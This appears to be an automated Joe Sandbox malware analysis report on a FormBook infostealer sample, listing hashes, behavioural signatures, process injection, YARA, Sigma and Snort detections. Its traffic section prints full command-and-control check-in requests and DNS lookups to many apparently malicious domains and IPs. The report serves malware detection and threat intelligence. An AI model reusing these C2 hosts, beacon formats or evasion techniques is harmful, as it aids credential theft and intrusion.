Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7RsDGpyOQk.exe

Overview

General Information

Sample name:7RsDGpyOQk.exe
renamed because original name is a hash value
Original sample name:24f58a84a8acf1b1e52fe60798e03b2e3b97d5f52628d7c40ffcc9b7937b9b12.exe
Analysis ID:1466969
MD5:cf27e45be1b40dd336d102e1449046d9
SHA1:5c0dcbb199502fed8f89d65cd3c2c5be9e0348f1
SHA256:24f58a84a8acf1b1e52fe60798e03b2e3b97d5f52628d7c40ffcc9b7937b9b12
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 7RsDGpyOQk.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\7RsDGpyOQk.exe" MD5: CF27E45BE1B40DD336D102E1449046D9)
    • svchost.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\7RsDGpyOQk.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • UJCHZIamnVz.exe (PID: 1700 cmdline: "C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • subst.exe (PID: 7744 cmdline: "C:\Windows\SysWOW64\subst.exe" MD5: 0EAC8241D39176E0FA48B57C76C54742)
          • UJCHZIamnVz.exe (PID: 1908 cmdline: "C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7948 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2cca3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16352:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2daa3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17152:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\7RsDGpyOQk.exe", CommandLine: "C:\Users\user\Desktop\7RsDGpyOQk.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\7RsDGpyOQk.exe", ParentImage: C:\Users\user\Desktop\7RsDGpyOQk.exe, ParentProcessId: 7444, ParentProcessName: 7RsDGpyOQk.exe, ProcessCommandLine: "C:\Users\user\Desktop\7RsDGpyOQk.exe", ProcessId: 7460, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\7RsDGpyOQk.exe", CommandLine: "C:\Users\user\Desktop\7RsDGpyOQk.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\7RsDGpyOQk.exe", ParentImage: C:\Users\user\Desktop\7RsDGpyOQk.exe, ParentProcessId: 7444, ParentProcessName: 7RsDGpyOQk.exe, ProcessCommandLine: "C:\Users\user\Desktop\7RsDGpyOQk.exe", ProcessId: 7460, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:07/03/24-15:57:00.193570
            SID:2856318
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: 7RsDGpyOQk.exeReversingLabs: Detection: 79%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: 7RsDGpyOQk.exeJoe Sandbox ML: detected
            Source: 7RsDGpyOQk.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: subst.pdb source: svchost.exe, 00000001.00000002.1968176241.0000000003419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968158408.0000000003400000.00000004.00000020.00020000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162803176.0000000001468000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: subst.pdbGCTL source: svchost.exe, 00000001.00000002.1968176241.0000000003419000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968158408.0000000003400000.00000004.00000020.00020000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162803176.0000000001468000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UJCHZIamnVz.exe, 00000003.00000000.1891445097.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2035492921.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: 7RsDGpyOQk.exe, 00000000.00000003.1700648692.0000000003580000.00000004.00001000.00020000.00000000.sdmp, 7RsDGpyOQk.exe, 00000000.00000003.1701137801.0000000003720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1872671742.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968401165.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968401165.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1874644397.0000000003900000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163447756.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163447756.000000000326E000.00000040.00001000.00020000.00000000.sdmp, subst.exe, 00000004.00000003.1970410366.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000003.1968115517.0000000002D71000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 7RsDGpyOQk.exe, 00000000.00000003.1700648692.0000000003580000.00000004.00001000.00020000.00000000.sdmp, 7RsDGpyOQk.exe, 00000000.00000003.1701137801.0000000003720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1872671742.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968401165.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1968401165.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1874644397.0000000003900000.00000004.00000020.00020000.00000000.sdmp, subst.exe, subst.exe, 00000004.00000002.4163447756.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163447756.000000000326E000.00000040.00001000.00020000.00000000.sdmp, subst.exe, 00000004.00000003.1970410366.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000003.1968115517.0000000002D71000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: subst.exe, 00000004.00000002.4162582023.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.00000000036FC000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2036102940.000000000324C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B4DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: subst.exe, 00000004.00000002.4162582023.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.00000000036FC000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2036102940.000000000324C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B4DC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00204696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00204696
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020C93C FindFirstFileW,FindClose,0_2_0020C93C
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0020C9C7
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0020F200
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0020F35D
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0020F65E
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00203A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00203A2B
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_00203D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00203D4E
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_0020BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0020BF27
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4_2_0084BCA0 FindFirstFileW,FindNextFileW,FindClose,4_2_0084BCA0
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4x nop then xor eax, eax4_2_00839780
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4x nop then pop edi4_2_0083DF1E
            Source: C:\Windows\SysWOW64\subst.exeCode function: 4x nop then mov ebx, 00000004h4_2_02E6053E

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.4:49738 -> 76.223.105.230:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.ajjmamlllqqq.xyz
            Source: DNS query: www.077551.xyz
            Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
            Source: Joe Sandbox ViewIP Address: 76.223.105.230 76.223.105.230
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exeCode function: 0_2_002125E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_002125E2
            Source: global trafficHTTP traffic detected: GET /p5xb/?TvpPfhGp=gZSYabCnKqSr1J4TudILkU7OUr6zW8quS0K3SSEWSlTvQpNCKBnGards6ZD8X7yXO9b/F0Vh3EPZ273HAe14Zo8L5xIdhoBu33QGrF37ZE8rNfV+CMbs4i4=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.immedu.websiteUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /i3r0/?TvpPfhGp=2wwNf3uh0L74coHFwFoEwJLZZncz0eUv2PDbuROkov9Y0f520r30B60Dc6sw70wr8VqsfcnHqRGaEDIOfEcEM+xuD/kdVb8f6u/HqHihPox78cRvPoIrzf8=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.eoghenluire.comUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /5uz4/?TvpPfhGp=dL4clO0CJrDMcIxu4IdYSuD/cDaqSVWvuwN44KEfTTu0on3tmzTjREisTNIHlk2ZlqA7xyFr2WD4XoYfHF4eAi4rK2PJMwuiV4L1panftdceIKli3LKULfU=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ajjmamlllqqq.xyzUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /ixzv/?TvpPfhGp=3oi8oJRBwbk3Fv7B4wkBwCYPdwSnFCWHmnvM7LB8bGn5gZyL3DPz3/FGAD+hTQwo1cQLx9Xf6C04wJsqCrUqebqL9pABwbW+sBk+bBPfLH9pAE6bRw2vg/E=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.114lala.netUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /4n8t/?TvpPfhGp=ghFc6znRteN4Ja3nQE93pb+klyhhNrAgC93ynk4+Lc8v1BQxlwgw+LzLUcq3fIz0ommJFFyvB0Z1ghBSVa+hRbhXI8cuWBtdWYqwziEG2BzJAupp88dDv3U=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.shabygreen.topUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /4ogj/?TvpPfhGp=YTRT1VqeLBjCR4EP9RCwoUuRD3fAmDmZSXxlYBWmziMpmVFqJYD2flBFEL5Xrb4qxpJfVCdAXewDQ3blUDpCJrAw7sENNjOuYnGrLaGL8E6T/3d2k8tiM5Q=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.077551.xyzUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /8g7d/?TvpPfhGp=rWbbvp+cwrqQgazA9nOhlKpoIaKdpvX3NtKjwAvzyCJ08CtHZWjUKOIyI7s4v/dodflG0NuedqdGjOxv5Uk5GEd+1aRY1dG/6xJxc0ee/cBS07/9XhY/WVk=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.costmoon.comUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /axxb/?TvpPfhGp=Tomi9JcGHwU5W62uuIED6rgr9HvHoI2i1WV2/yOG5tMyELYD9gbQrdSRvly679CAlYQP7KMM3mPFOKjE9n3WDNNFNlS8pk0/g6E2kBMo21yRC+YJoIsNK7I=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.w25dn.topUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /2gp2/?TvpPfhGp=Y99li2SS0jFkeE2dW5fsIsqznCbyzAVNDcc+JEah7Ezrvxte8MpPDgExvKgilbZfLMJ3frvQmAcJOgkNzzn64tqjGSAfcd+mGzUUslxnkGXz4OyUxuBjmso=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.n-ambu.comUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /ndwb/?TvpPfhGp=/qyS5uFMStFKGiC7gxlopLbluV61vu+RjDYXbeo3nHi2h/5APNXwWrEdkOsmqUKqQbrnCVB7EyQd8x04JYqB6drGuaM8rj1nd0RRI3hUZH7sElvU+ZecVtI=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.qrdinamicos.comUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /42ua/?TvpPfhGp=666AcZt0vqUScrmitGmo0Sn7ionns3Mbllq+uEGn7nXx6ARBAUIN9tdRik4SosB3sd2YOi8W6KuCii1PvQhz+VFeXf3qlNf5sD8BLIsMKCpTeSvGwI45HLM=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.g2m-os.comUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI+gpm/LVbhI65FVShh/tgBI/y9RfM7r0s9qzU65mo6yF4gvL+0acj1h9sdpnc2oWt6mPPUzfC6i0Cm604hOcmgozNJQF0xWBsyGELgFo=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.vendasnaweb1.comUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /8pbu/?TvpPfhGp=kNNnEV5wtfMTk7EsKDdqofuXk+Rn8vJj2yYB/JV+5cekMazgA8cmAYXSGgFhL+XbvnxEPdo1Vtw1uTcXwhetC6FtU7s9g1m4smEVJIuSZwU+vhX8ycfAGhs=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dudapolicarpo.onlineUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /50i6/?TvpPfhGp=qitUcqUffP2yk+NlTcn0cnkOyWQfzTGozjE+fkR+cpfvqRoRQe0JJpYteZO1ejUj8Zcre8jv6/KV+/CxNuPp0r5bf+UIe/RIppbsiuOOAOzLhzD7OHcJ9fs=&Y664G=SttDen986 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rodotest2.proUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
            Source: global trafficDNS traffic detected: DNS query: www.immedu.website
            Source: global trafficDNS traffic detected: DNS query: www.eoghenluire.com
            Source: global trafficDNS traffic detected: DNS query: www.ajjmamlllqqq.xyz
            Source: global trafficDNS traffic detected: DNS query: www.114lala.net
            Source: global trafficDNS traffic detected: DNS query: www.shabygreen.top
            Source: global trafficDNS traffic detected: DNS query: www.077551.xyz
            Source: global trafficDNS traffic detected: DNS query: www.costmoon.com
            Source: global trafficDNS traffic detected: DNS query: www.w25dn.top
            Source: global trafficDNS traffic detected: DNS query: www.indotop77.art
            Source: global trafficDNS traffic detected: DNS query: www.n-ambu.com
            Source: global trafficDNS traffic detected: DNS query: www.qrdinamicos.com
            Source: global trafficDNS traffic detected: DNS query: www.g2m-os.com
            Source: global trafficDNS traffic detected: DNS query: www.vendasnaweb1.com
            Source: global trafficDNS traffic detected: DNS query: www.dudapolicarpo.online
            Source: global trafficDNS traffic detected: DNS query: www.rodotest2.pro
            Source: global trafficDNS traffic detected: DNS query: www.voupeclients.com
